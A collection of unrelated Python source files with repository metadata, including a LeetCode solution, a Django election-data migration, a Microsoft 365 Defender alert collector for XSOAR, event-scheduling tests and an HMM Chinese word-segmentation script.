hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
binary-tree-right-side-view/binary-tree-right-side-view.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
# Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right class Solution: def rightSideView(self, root: Optional[TreeNode]) -> List[int]: if not root: return [] output=[] stack=[(root,0)] prev_depth=0 while(stack): node, depth = stack.pop(0) if depth!=prev_depth: output.append(prev_node.val) if node.left: stack.append((node.left, depth+1)) if node.right: stack.append((node.right, depth+1)) prev_depth=depth prev_node=node output.append(prev_node.val) return output
30.846154
67
0.523691
decba192a977ffe5ba11a40e9c31065a4fe14352
11,249
py
Python
src/austria/migrations/0001_initial.py
frocentus/offenewahlen_api
71860583890f8a4c23df67f271e8f13558fa9582
[ "MIT" ]
14
2017-07-12T14:42:57.000Z
2017-09-08T20:32:53.000Z
src/austria/migrations/0001_initial.py
frocentus/offenewahlen_api
71860583890f8a4c23df67f271e8f13558fa9582
[ "MIT" ]
209
2017-07-11T21:36:01.000Z
2017-11-05T01:10:50.000Z
src/austria/migrations/0001_initial.py
OKFNat/offenewahlen-api
71860583890f8a4c23df67f271e8f13558fa9582
[ "MIT" ]
8
2017-07-15T09:40:42.000Z
2018-01-12T03:02:06.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2018-04-05 23:20 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='District', fields=[ ('short_code', models.CharField(max_length=3, primary_key=True, serialize=False)), ('name', models.CharField(max_length=100, unique=True)), ], options={ 'verbose_name_plural': 'districts', 'verbose_name': 'district', 'ordering': ['short_code'], }, ), migrations.CreateModel( name='Election', fields=[ ('short_name', models.CharField(max_length=50, primary_key=True, serialize=False)), ('short_name_text', models.CharField(max_length=50, null=True)), ('full_name', models.CharField(max_length=200)), ('election_type', models.CharField(max_length=100)), ('election_id', models.CharField(max_length=20, null=True)), ('wikidata_id', models.CharField(max_length=20, null=True, unique=True)), ('administrative_level', models.CharField(max_length=100)), ('election_day', models.DateTimeField(verbose_name='timestamp of election day')), ('status', models.CharField(default='init', max_length=200)), ], options={ 'verbose_name_plural': 'elections', 'ordering': ['short_name'], 'verbose_name': 'election', 'get_latest_by': 'election_day', }, ), migrations.CreateModel( name='List', fields=[ ('short_name', models.CharField(max_length=50, primary_key=True, serialize=False)), ('short_name_text', models.CharField(default=None, max_length=50)), ('full_name', models.CharField(default=None, max_length=200)), ], options={ 'verbose_name_plural': 'lists', 'verbose_name': 'list', 'ordering': ['short_name'], }, ), migrations.CreateModel( name='ListResult', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('votes', models.IntegerField(default=-1, null=True)), ], options={ 'verbose_name_plural': 'list results', 'verbose_name': 'list result', 'ordering': ['id'], }, ), migrations.CreateModel( name='Municipality', fields=[ ('code', models.CharField(max_length=5, primary_key=True, serialize=False)), ('name', models.CharField(max_length=200)), ('kennzahl', models.CharField(default=None, max_length=5)), ], options={ 'verbose_name_plural': 'municipalities', 'verbose_name': 'municipality', 'ordering': ['code'], }, ), migrations.CreateModel( name='Party', fields=[ ('short_name', models.CharField(max_length=50, primary_key=True, serialize=False)), ('short_name_text', models.CharField(default=None, max_length=50, unique=True)), ('full_name', models.CharField(max_length=200, unique=True)), ('family', models.CharField(default=None, max_length=200, null=True)), ('wikidata_id', models.CharField(default=None, max_length=20, null=True, unique=True)), ('website', models.CharField(default=None, max_length=100, null=True)), ('location', models.CharField(default=None, max_length=100, null=True)), ], options={ 'verbose_name_plural': 'parties', 'verbose_name': 'party', 'ordering': ['short_name'], }, ), migrations.CreateModel( name='PollingStation', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('name', models.CharField(default=None, max_length=200, null=True)), ('type', models.CharField(max_length=30)), ], options={ 'verbose_name_plural': 'polling stations', 'verbose_name': 'polling station', 'ordering': ['id'], }, ), migrations.CreateModel( name='PollingStationResult', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('eligible_voters', models.IntegerField(default=-1, null=True)), ('votes', models.IntegerField(default=-1)), ('valid', models.IntegerField(default=-1)), ('invalid', models.IntegerField(default=-1)), ('ts_result', models.DateTimeField(verbose_name='timestamp of bmi result')), ], options={ 'verbose_name_plural': 'polling station results', 'ordering': ['id'], 'verbose_name': 'polling station result', 'get_latest_by': 'ts_result', }, ), migrations.CreateModel( name='RawData', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('ts_file', models.DateTimeField(null=True, verbose_name='creation date of original file')), ('ts_import', models.DateTimeField(default=None, verbose_name='import date of file into database')), ('hash', models.CharField(max_length=100)), ('content', models.TextField()), ('header', models.TextField(default=None, null=True)), ('dataformat', models.CharField(max_length=50)), ('description', models.TextField(default=None)), ], options={ 'verbose_name_plural': 'raw data', 'ordering': ['id'], 'verbose_name': 'raw data', 'get_latest_by': 'ts_file', }, ), migrations.CreateModel( name='RegionalElectoralDistrict', fields=[ ('short_code', models.CharField(max_length=2, primary_key=True, serialize=False)), ('name', models.CharField(default=None, max_length=100)), ], options={ 'verbose_name_plural': 'regional electoral districts', 'verbose_name': 'regional electoral district', 'ordering': ['short_code'], }, ), migrations.CreateModel( name='State', fields=[ ('short_code', models.CharField(max_length=1, primary_key=True, serialize=False)), ('name', models.CharField(max_length=100, unique=True)), ], options={ 'verbose_name_plural': 'states', 'verbose_name': 'state', 'ordering': ['short_code'], }, ), migrations.AddIndex( model_name='state', index=models.Index(fields=['name', 'short_code'], name='austria_sta_name_6993c1_idx'), ), migrations.AddIndex( model_name='regionalelectoraldistrict', index=models.Index(fields=['name', 'short_code'], name='austria_reg_name_b53223_idx'), ), migrations.AddField( model_name='rawdata', name='election', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.Election'), ), migrations.AddField( model_name='pollingstationresult', name='election', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.Election'), ), migrations.AddField( model_name='pollingstationresult', name='polling_station', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.PollingStation'), ), migrations.AddField( model_name='pollingstation', name='municipality', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.Municipality'), ), migrations.AddIndex( model_name='party', index=models.Index(fields=['full_name', 'short_name', 'short_name_text'], name='austria_par_full_na_2a1baa_idx'), ), migrations.AddField( model_name='municipality', name='district', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.District'), ), migrations.AddField( model_name='municipality', name='regional_electoral_district', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.RegionalElectoralDistrict'), ), migrations.AddField( model_name='listresult', name='election_list', field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='austria.List'), ), migrations.AddField( model_name='listresult', name='polling_station_result', field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='austria.PollingStationResult'), ), migrations.AddField( model_name='list', name='party', field=models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.PROTECT, to='austria.Party'), ), migrations.AddIndex( model_name='election', index=models.Index(fields=['full_name', 'short_name', 'short_name_text'], name='austria_ele_full_na_bbb3c0_idx'), ), migrations.AddField( model_name='district', name='state', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='austria.State'), ), migrations.AddIndex( model_name='pollingstation', index=models.Index(fields=['name'], name='austria_pol_name_56e525_idx'), ), migrations.AddIndex( model_name='municipality', index=models.Index(fields=['name', 'code', 'kennzahl'], name='austria_mun_name_329503_idx'), ), migrations.AddIndex( model_name='list', index=models.Index(fields=['short_name', 'full_name', 'short_name_text'], name='austria_lis_short_n_4b5871_idx'), ), migrations.AddIndex( model_name='district', index=models.Index(fields=['name', 'short_code'], name='austria_dis_name_e39bb2_idx'), ), ]
43.265385
135
0.552938
3e771eb33afa0ab45444ee8bac5a61bd72d00ef3
11,803
py
Python
Packs/Microsoft365Defender/Integrations/Microsoft365DefenderEventCollector/Microsoft365DefenderEventCollector.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
1
2021-11-02T05:36:38.000Z
2021-11-02T05:36:38.000Z
Packs/Microsoft365Defender/Integrations/Microsoft365DefenderEventCollector/Microsoft365DefenderEventCollector.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
61
2021-10-07T08:54:38.000Z
2022-03-31T10:25:35.000Z
Packs/Microsoft365Defender/Integrations/Microsoft365DefenderEventCollector/Microsoft365DefenderEventCollector.py
jrauen/content
81a92be1cbb053a5f26a6f325eff3afc0ca840e0
[ "MIT" ]
null
null
null
# pylint: disable=no-name-in-module # pylint: disable=no-self-argument import demistomock as demisto from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import from CommonServerUserPython import * # noqa from abc import ABC from typing import Any, Callable, Optional from enum import Enum from pydantic import BaseConfig, BaseModel, AnyUrl, validator # type: ignore[E0611, E0611, E0611] from requests.auth import HTTPBasicAuth import requests from MicrosoftApiModule import * # Disable insecure warnings requests.packages.urllib3.disable_warnings() # pylint: disable=no-member ''' CONSTANTS ''' MAX_ALERTS_PAGE_SIZE = 10000 ALERT_CREATION_TIME = 'alertCreationTime' DEFNDER_DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ' SECURITY_SCOPE = 'https://securitycenter.onmicrosoft.com/windowsatpservice/.default' AUTH_ERROR_MSG = 'Authorization Error: make sure tenant id, client id and client secret is correctly set' ''' HELPER CLASSES ''' # COPY OF SiemApiModule class Method(str, Enum): GET = 'GET' POST = 'POST' PUT = 'PUT' HEAD = 'HEAD' PATCH = 'PATCH' DELETE = 'DELETE' def load_json(v: Any) -> dict: if not isinstance(v, (dict, str)): raise ValueError('headers are not dict or a valid json') if isinstance(v, str): try: v = json.loads(v) if not isinstance(v, dict): raise ValueError('headers are not from dict type') except json.decoder.JSONDecodeError as exc: raise ValueError('headers are not valid Json object') from exc if isinstance(v, dict): return v class IntegrationHTTPRequest(BaseModel): method: Method url: AnyUrl verify: bool = True headers: dict = dict() # type: ignore[type-arg] auth: Optional[HTTPBasicAuth] data: Any = None class Config(BaseConfig): arbitrary_types_allowed = True _normalize_headers = validator('headers', pre=True, allow_reuse=True)( load_json ) class Credentials(BaseModel): identifier: Optional[str] password: str def set_authorization(request: IntegrationHTTPRequest, auth_credendtials): """Automatic authorization. Supports {Authorization: Bearer __token__} or Basic Auth. """ creds = Credentials.parse_obj(auth_credendtials) if creds.password and creds.identifier: request.auth = HTTPBasicAuth(creds.identifier, creds.password) auth = {'Authorization': f'Bearer {creds.password}'} if request.headers: request.headers |= auth # type: ignore[assignment, operator] else: request.headers = auth # type: ignore[assignment] class IntegrationOptions(BaseModel): """Add here any option you need to add to the logic""" proxy: bool = False limit: int = 1000 class IntegrationEventsClient(ABC): def __init__( self, request: IntegrationHTTPRequest, options: IntegrationOptions, session=requests.Session(), ): self.request = request self.options = options self.session = session self._set_proxy() self._skip_cert_verification() @abstractmethod def set_request_filter(self, after: Any): """TODO: set the next request's filter. Example: """ self.request.headers['after'] = after def __del__(self): try: self.session.close() except AttributeError as err: demisto.debug( f'ignore exceptions raised due to session not used by the client. {err=}' ) def call(self, request: IntegrationHTTPRequest) -> requests.Response: try: response = self.session.request(**request.dict()) response.raise_for_status() return response except Exception as exc: msg = f'something went wrong with the http call {exc}' LOG(msg) raise DemistoException(msg) from exc def _skip_cert_verification( self, skip_cert_verification: Callable = skip_cert_verification ): if not self.request.verify: skip_cert_verification() def _set_proxy(self): if self.options.proxy: ensure_proxy_has_http_prefix() else: skip_proxy() class IntegrationGetEvents(ABC): def __init__( self, client: IntegrationEventsClient, options: IntegrationOptions ) -> None: self.client = client self.options = options def run(self): stored = [] for logs in self._iter_events(): stored.extend(logs) if len(stored) >= self.options.limit: return stored[:self.options.limit] return stored def call(self) -> requests.Response: return self.client.call(self.client.request) @staticmethod @abstractmethod def get_last_run(events: list) -> dict: """Logic to get the last run from the events Example: """ return {'after': events[-1]['created']} @abstractmethod def _iter_events(self): """Create iterators with Yield""" pass # END COPY OF SiemApiModule class DefenderIntegrationOptions(IntegrationOptions): first_fetch: str class DefenderAuthenticator(BaseModel): verify: bool url: str tenant_id: str client_id: str credentials: dict ms_client: Any = None def set_authorization(self, request: IntegrationHTTPRequest): try: if not self.ms_client: demisto.debug('try init the ms client for the first time') self.ms_client = MicrosoftClient( base_url=self.url, tenant_id=self.tenant_id, auth_id=self.client_id, enc_key=self.credentials.get('password'), scope=SECURITY_SCOPE, verify=self.verify, self_deployed=True ) token = self.ms_client.get_access_token() auth = {'Authorization': f'Bearer {token}'} if request.headers: request.headers |= auth # type: ignore[assignment, operator] else: request.headers = auth # type: ignore[assignment] demisto.debug('getting access token for Defender Authenticator - succeeded') except BaseException as e: # catch BaseException to catch also sys.exit via return_error demisto.error(f'Fail to authenticate with Microsoft services: {str(e)}') err_msg = 'Fail to authenticate with Microsoft services, see the error details in the log' raise DemistoException(err_msg) class DefenderHTTPRequest(IntegrationHTTPRequest): params: dict = dict() method: Method = Method.GET _normalize_url = validator('url', pre=True, allow_reuse=True)( lambda base_url: base_url + '/api/alerts' ) class DefenderClient(IntegrationEventsClient): authenticator: DefenderAuthenticator request: DefenderHTTPRequest options: DefenderIntegrationOptions def __init__(self, request: DefenderHTTPRequest, options: IntegrationOptions, authenticator: DefenderAuthenticator): self.authenticator = authenticator super().__init__(request, options) def set_request_filter(self, after: Any): limit = min(self.options.limit, MAX_ALERTS_PAGE_SIZE) if not after: demisto.debug(f'lastRunObj is empty, calculate the first fetch time according {self.options.first_fetch=}') first_fetch_date = dateparser.parse(self.options.first_fetch, settings={'TIMEZONE': 'UTC'}) after = datetime.strftime(first_fetch_date, DEFNDER_DATE_FORMAT) # type: ignore[arg-type] self.request.params = { '$filter': f'{ALERT_CREATION_TIME}+gt+{after}', '$orderby': f'{ALERT_CREATION_TIME}+asc', '$top': limit, '$expand': 'evidence', } demisto.debug(f'setting the request filter to be: {self.request.params}') def authenticate(self): self.authenticator.set_authorization(self.request) class DefenderGetEvents(IntegrationGetEvents): client: DefenderClient def _iter_events(self): self.client.authenticate() self.client.set_request_filter(demisto.getLastRun() and demisto.getLastRun().get('after')) response = self.client.call(self.client.request) value = response.json().get('value', []) demisto.debug(f'getting {len(value)} alerts from Defender Api') return [value] @staticmethod def get_last_run(events: list) -> dict: """Logic to get the last run from the events """ return events and len(events) > 0 and {'after': events[-1]['alertCreationTime']} or demisto.getLastRun() ''' HELPER FUNCTIONS ''' ''' COMMAND FUNCTIONS ''' def test_module(get_events: DefenderGetEvents) -> str: """Tests API connectivity and authentication' Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful. Raises exceptions if something goes wrong. :type get_events: ``DefenderGetEvents`` :param get_events: the get_events instance :return: 'ok' if test passed, anything else will fail the test. :rtype: ``str`` """ message: str = '' try: get_events.client.request.params = {'limit': 1} get_events.run() message = 'ok' except DemistoException as e: if 'Forbidden' in str(e) or 'authenticate' in str(e): message = AUTH_ERROR_MSG else: raise return message def main(command: str, demisto_params: dict): demisto.debug(f'Command being called is {command}') try: options = DefenderIntegrationOptions.parse_obj(demisto_params) request = DefenderHTTPRequest.parse_obj(demisto_params) authenticator = DefenderAuthenticator.parse_obj(demisto_params) clinet = DefenderClient(request=request, options=options, authenticator=authenticator) get_events = DefenderGetEvents(client=clinet, options=options) if command == 'test-module': return_results(test_module(get_events=get_events)) elif command in ('fetch-events', 'microsoft-365-defender-get-events'): events = get_events.run() if command == 'microsoft-365-defender-get-events': demisto.debug(f'{command=}, publishing events to the context') human_readable = tableToMarkdown(name="Alerts:", t=events) return_results(CommandResults('Microsoft365Defender.alerts', 'id', events, readable_output=human_readable)) elif events: demisto.setLastRun(get_events.get_last_run(events)) demisto.debug(f'Last run set to {demisto.getLastRun()}') if command == 'fetch-events' or argToBoolean(demisto_params.get('push_to_xsiam', False)): # publishing events to XSIAM vendor = demisto_params.get('vendor') product = demisto_params.get('product') demisto.debug(f'{command=}, publishing events to XSIAM') send_events_to_xsiam(events, vendor=vendor, product=product) # Log exceptions and return errors except Exception as e: demisto.error(traceback.format_exc()) # print the traceback return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}') ''' ENTRY POINT ''' if __name__ in ('__main__', '__builtin__', 'builtins'): # Args is always stronger. Get getIntegrationContext even stronger demisto_params = demisto.params() | demisto.args() | demisto.getLastRun() main(demisto.command(), demisto_params)
32.425824
123
0.649581
e4295da2f7812b00aee90ea339be9189b4602eb0
352
py
Python
LFA/class_assembly_line.py
joao-frohlich/BCC
9ed74eb6d921d1280f48680677a2140c5383368d
[ "Apache-2.0" ]
10
2020-12-08T20:18:15.000Z
2021-06-07T20:00:07.000Z
LFA/class_assembly_line.py
joao-frohlich/BCC
9ed74eb6d921d1280f48680677a2140c5383368d
[ "Apache-2.0" ]
2
2021-06-28T03:42:13.000Z
2021-06-28T16:53:13.000Z
LFA/class_assembly_line.py
joao-frohlich/BCC
9ed74eb6d921d1280f48680677a2140c5383368d
[ "Apache-2.0" ]
2
2021-01-14T19:59:20.000Z
2021-06-15T11:53:21.000Z
from utils import * from class_moore import Moore class Assembly_Line: def __init__(self, assembly_type): self.automaton = Moore(*read_7_tuple_from_data(assembly_type)) self.type = self.automaton.name def __len__(self): return self.automaton.capacity def __str__(self): return str(self.automaton.output)
23.466667
70
0.704545
39adf3d80d50ee6f6c6e6afd03e42f583ec4eb69
879
py
Python
exercises/fr/test_04_12_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/fr/test_04_12_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/fr/test_04_12_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
def test(): assert len(doc1.ents) == 2, "Attendu deux entités dans le premier exemple" assert ( doc1.ents[0].label_ == "SITE_WEB" and doc1.ents[0].text == "Reddit" ), "Vérifie l'entité une dans le premier exemple" assert ( doc1.ents[1].label_ == "SITE_WEB" and doc1.ents[1].text == "Patreon" ), "Vérifie l'entité deux dans le premier exemple" assert len(doc2.ents) == 1, "Attendu une entité dans dans le deuxième exemple" assert ( doc2.ents[0].label_ == "SITE_WEB" and doc2.ents[0].text == "YouTube" ), "Vérifie l'entité dans le deuxième exemple" assert len(doc3.ents) == 1, "Attendu une entité dans dans le troisième exemple" assert ( doc3.ents[0].label_ == "SITE_WEB" and doc3.ents[0].text == "Reddit" ), "Vérifie l'entité dans le troisième exemple" __msg__.good("Joli boulot !")
46.263158
83
0.631399
0806256e761da98bcded927cddb03e948b352211
9,338
py
Python
tests/services/test_event.py
DanielGrams/gsevp
e94034f7b64de76f38754b56455e83092378261f
[ "MIT" ]
1
2021-06-01T14:49:18.000Z
2021-06-01T14:49:18.000Z
tests/services/test_event.py
DanielGrams/gsevp
e94034f7b64de76f38754b56455e83092378261f
[ "MIT" ]
286
2020-12-04T14:13:00.000Z
2022-03-09T19:05:16.000Z
tests/services/test_event.py
DanielGrams/gsevpt
a92f71694388e227e65ed1b24446246ee688d00e
[ "MIT" ]
null
null
null
import pytest def test_update_event_dates_with_recurrence_rule(client, seeder, utils, app): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event(admin_unit_id) with app.app_context(): from project.dateutils import create_berlin_date from project.models import Event from project.services.event import update_event_dates_with_recurrence_rule event = Event.query.get(event_id) date_definition = event.date_definitions[0] date_definition.start = create_berlin_date(2030, 12, 31, 14, 30) date_definition.end = create_berlin_date(2030, 12, 31, 16, 30) update_event_dates_with_recurrence_rule(event) len_dates = len(event.dates) assert len_dates == 1 event_date = event.dates[0] assert event_date.start == date_definition.start assert event_date.end == date_definition.end # Update again update_event_dates_with_recurrence_rule(event) len_dates = len(event.dates) assert len_dates == 1 event_date = event.dates[0] assert event_date.start == date_definition.start assert event_date.end == date_definition.end # All-day date_definition.allday = True update_event_dates_with_recurrence_rule(event) len_dates = len(event.dates) assert len_dates == 1 event_date = event.dates[0] assert event_date.start == date_definition.start assert event_date.end == date_definition.end assert event_date.allday # Wiederholt sich alle 1 Tage, endet nach 7 Ereigniss(en) date_definition.recurrence_rule = "RRULE:FREQ=DAILY;COUNT=7" update_event_dates_with_recurrence_rule(event) len_dates = len(event.dates) assert len_dates == 7 def test_update_event_dates_with_recurrence_rule_past( client, seeder, utils, app, mocker ): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event(admin_unit_id) with app.app_context(): from project.dateutils import create_berlin_date from project.models import Event from project.services.event import update_event_dates_with_recurrence_rule utils.mock_now(mocker, 2020, 1, 3) event = Event.query.get(event_id) date_definition = event.date_definitions[0] date_definition.start = create_berlin_date(2020, 1, 2, 14, 30) date_definition.end = create_berlin_date(2020, 1, 2, 16, 30) # Wiederholt sich alle 1 Tage, endet nach 7 Ereigniss(en) date_definition.recurrence_rule = "RRULE:FREQ=DAILY;COUNT=7" update_event_dates_with_recurrence_rule(event) # Es sollen nur 6 Daten vorhanden sein (das erste Date war gestern) len_dates = len(event.dates) assert len_dates == 6 # Das erste Date ist heute event_date = event.dates[0] assert event_date.start == create_berlin_date(2020, 1, 3, 14, 30) assert event_date.end == create_berlin_date(2020, 1, 3, 16, 30) def test_update_event_dates_with_recurrence_rule_past_forever( client, seeder, utils, app, mocker ): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event(admin_unit_id) with app.app_context(): from project.dateutils import create_berlin_date from project.models import Event from project.services.event import update_event_dates_with_recurrence_rule utils.mock_now(mocker, 2020, 1, 3) event = Event.query.get(event_id) date_definition = event.date_definitions[0] date_definition.start = create_berlin_date(2019, 1, 1, 14, 30) date_definition.end = create_berlin_date(2019, 1, 1, 16, 30) # Wiederholt sich alle 1 Tage (unendlich) date_definition.recurrence_rule = "RRULE:FREQ=DAILY" update_event_dates_with_recurrence_rule(event) # Es sollen 367 Daten vorhanden sein (Schaltjahr +1) len_dates = len(event.dates) assert len_dates == 367 # Das erste Date ist heute event_date = event.dates[0] assert event_date.start == create_berlin_date(2020, 1, 3, 14, 30) assert event_date.end == create_berlin_date(2020, 1, 3, 16, 30) # Das letzte Date ist in einem Jahr event_date = event.dates[366] assert event_date.start == create_berlin_date(2021, 1, 3, 14, 30) assert event_date.end == create_berlin_date(2021, 1, 3, 16, 30) def test_update_event_dates_with_recurrence_rule_exdate( client, seeder, utils, app, mocker ): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event(admin_unit_id) with app.app_context(): from project.dateutils import create_berlin_date from project.models import Event from project.services.event import update_event_dates_with_recurrence_rule utils.mock_now(mocker, 2021, 6, 1) event = Event.query.get(event_id) date_definition = event.date_definitions[0] date_definition.start = create_berlin_date(2021, 4, 21, 17, 0) date_definition.end = create_berlin_date(2021, 4, 21, 18, 0) # Wiederholt sich jeden Mittwoch date_definition.recurrence_rule = "RRULE:FREQ=WEEKLY;BYDAY=WE;UNTIL=20211231T000000\nEXDATE:20210216T000000,20210223T000000,20210602T000000" update_event_dates_with_recurrence_rule(event) # Das erste Date soll nicht der 02.06. sein (excluded), sondern der 09.06. event_date = event.dates[0] assert event_date.start == create_berlin_date(2021, 6, 9, 17, 0) assert event_date.end == create_berlin_date(2021, 6, 9, 18, 0) def test_get_meta_data(seeder, app, db): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event(admin_unit_id) photo_id = seeder.upsert_default_image() with app.app_context(): from project.models import Event, EventAttendanceMode, Location from project.services.event import get_meta_data event = Event.query.get(event_id) event.attendance_mode = EventAttendanceMode.offline location = Location() location.city = "Stadt" event.event_place.location = location event.photo_id = photo_id db.session.commit() with app.test_request_context(): meta = get_meta_data(event) assert meta is not None def test_get_recurring_events(client, seeder, app): user_id, admin_unit_id = seeder.setup_base() event_id = seeder.create_event( admin_unit_id, recurrence_rule="RRULE:FREQ=DAILY;COUNT=7" ) seeder.create_event(admin_unit_id, recurrence_rule=None) seeder.create_event(admin_unit_id, recurrence_rule="") with app.app_context(): from project.services.event import get_recurring_events recurring_events = get_recurring_events() assert len(recurring_events) == 1 assert recurring_events[0].id == event_id def test_get_events_query(client, seeder, app): _, admin_unit_id = seeder.setup_base() seeder.create_event(admin_unit_id) seeder.upsert_event_place(admin_unit_id, "Other Place") with app.app_context(): from project.services.event import get_events_query from project.services.event_search import EventSearchParams params = EventSearchParams() params.admin_unit_id = admin_unit_id params.can_read_private_events = True events = get_events_query(params) pagination = events.paginate() assert pagination.total == 1 @pytest.mark.parametrize( "index, event_descs, keyword, results, order", [ (0, ("Führung durch Goslar", "Other"), "Goslar", 1, None), (1, ("Führung durch Goslar", "Other"), "Führung", 1, None), (2, ("Führung durch Goslar", "Other"), "Fuehrung", 0, None), (3, ("Führung durch Goslar", "Other"), "Goslar Führung", 1, None), ( 4, ("Führung durch Goslar", "Führung durch Soest"), "Goslar Führung", 1, None, ), ( 5, ( "Führung durch Goslar", "Führung durch Soest", "Führung durch Berlin", ), "Führung (Goslar OR Soest)", 2, None, ), ], ) def test_get_events_fulltext( client, seeder, app, index, event_descs, keyword, results, order ): _, admin_unit_id = seeder.setup_base() if type(event_descs) is not tuple: event_descs = [event_descs] event_ids = list() for event_desc in event_descs: event_id = seeder.create_event(admin_unit_id, name=event_desc) event_ids.append(event_id) with app.app_context(): from project.services.event import get_events_query from project.services.event_search import EventSearchParams params = EventSearchParams() params.keyword = keyword events = get_events_query(params) pagination = events.paginate() assert pagination.total == results if not order: order = range(0, len(event_descs) - 1) i = 0 for item in pagination.items: assert item.id == event_ids[order[i]] i = i + 1
34.330882
148
0.668344
083497431e4ea34ae2484440e44fa0809d4e3205
2,559
py
Python
Common_Algorithms/HMM/Wordseg_02.py
xrick/WolfNLP
ff59be5a180813e7127c7eaf52db2478c20e8431
[ "MIT" ]
null
null
null
Common_Algorithms/HMM/Wordseg_02.py
xrick/WolfNLP
ff59be5a180813e7127c7eaf52db2478c20e8431
[ "MIT" ]
null
null
null
Common_Algorithms/HMM/Wordseg_02.py
xrick/WolfNLP
ff59be5a180813e7127c7eaf52db2478c20e8431
[ "MIT" ]
null
null
null
#-*-coding:utf-8 # By tostq <[email protected]> # 博客: blog.csdn.net/tostq import numpy as np import hmm from hmmlearn.hmm import MultinomialHMM state_M = 4 word_N = 0 state_list = {'B':0,'M':1,'E':2,'S':3} # 获得某词的分词结果 # 如:(我:S)、(你好:BE)、(恭喜发财:BMME) def getList(input_str): outpout_str = [] if len(input_str) == 1: outpout_str.append(3) elif len(input_str) == 2: outpout_str = [0,2] else: M_num = len(input_str) -2 M_list = [1] * M_num outpout_str.append(0) outpout_str.extend(M_list) outpout_str.append(2) return outpout_str # 预处理词典:RenMinData.txt_utf8 def precess_data(): ifp = file("RenMinData.txt_utf8") line_num = 0 word_dic = {} word_ind = 0 line_seq = [] state_seq = [] # 保存句子的字序列及每个字的状态序列,并完成字典统计 for line in ifp: line_num += 1 if line_num % 10000 == 0: print line_num line = line.strip() if not line:continue line = line.decode("utf-8","ignore") word_list = [] for i in range(len(line)): if line[i] == " ":continue word_list.append(line[i]) # 建立单词表 if not word_dic.has_key(line[i]): word_dic[line[i]] = word_ind word_ind += 1 line_seq.append(word_list) lineArr = line.split(" ") line_state = [] for item in lineArr: line_state += getList(item) state_seq.append(np.array(line_state)) ifp.close() lines = [] for i in range(line_num): lines.append(np.array([[word_dic[x]] for x in line_seq[i]])) return lines,state_seq,word_dic # 将句子转换成字典序号序列 def word_trans(wordline, word_dic): word_inc = [] line = wordline.strip() line = line.decode("utf-8", "ignore") for n in range(len(line)): word_inc.append([word_dic[line[n]]]) return np.array(word_inc) X,Z,word_dic = precess_data() wordseg_hmm = hmm.DiscreteHMM(4,len(word_dic),5) wordseg_hmm.train_batch(X,Z) print "startprob_prior: ", wordseg_hmm.start_prob print "transmit: ", wordseg_hmm.transmat_prob sentence_1 = "我要回家吃饭" sentence_2 = "中国人民从此站起来了" sentence_3 = "经党中央研究决定" sentence_4 = "江主席发表重要讲话" Z_1 = wordseg_hmm.decode(word_trans(sentence_1,word_dic)) Z_2 = wordseg_hmm.decode(word_trans(sentence_2,word_dic)) Z_3 = wordseg_hmm.decode(word_trans(sentence_3,word_dic)) Z_4 = wordseg_hmm.decode(word_trans(sentence_4,word_dic)) print u"我要回家吃饭: ", Z_1 print u"中国人民从此站起来了: ", Z_2 print u"经党中央研究决定: ", Z_3 print u"江主席发表重要讲话: ", Z_4
25.088235
68
0.623681
f25bbeef8b86b5586bcf49e392dc55c4a785e375
913
py
Python
Algorithms/Implementation/forming_a_magic_square.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
Algorithms/Implementation/forming_a_magic_square.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
Algorithms/Implementation/forming_a_magic_square.py
byung-u/HackerRank
4c02fefff7002b3af774b99ebf8d40f149f9d163
[ "MIT" ]
null
null
null
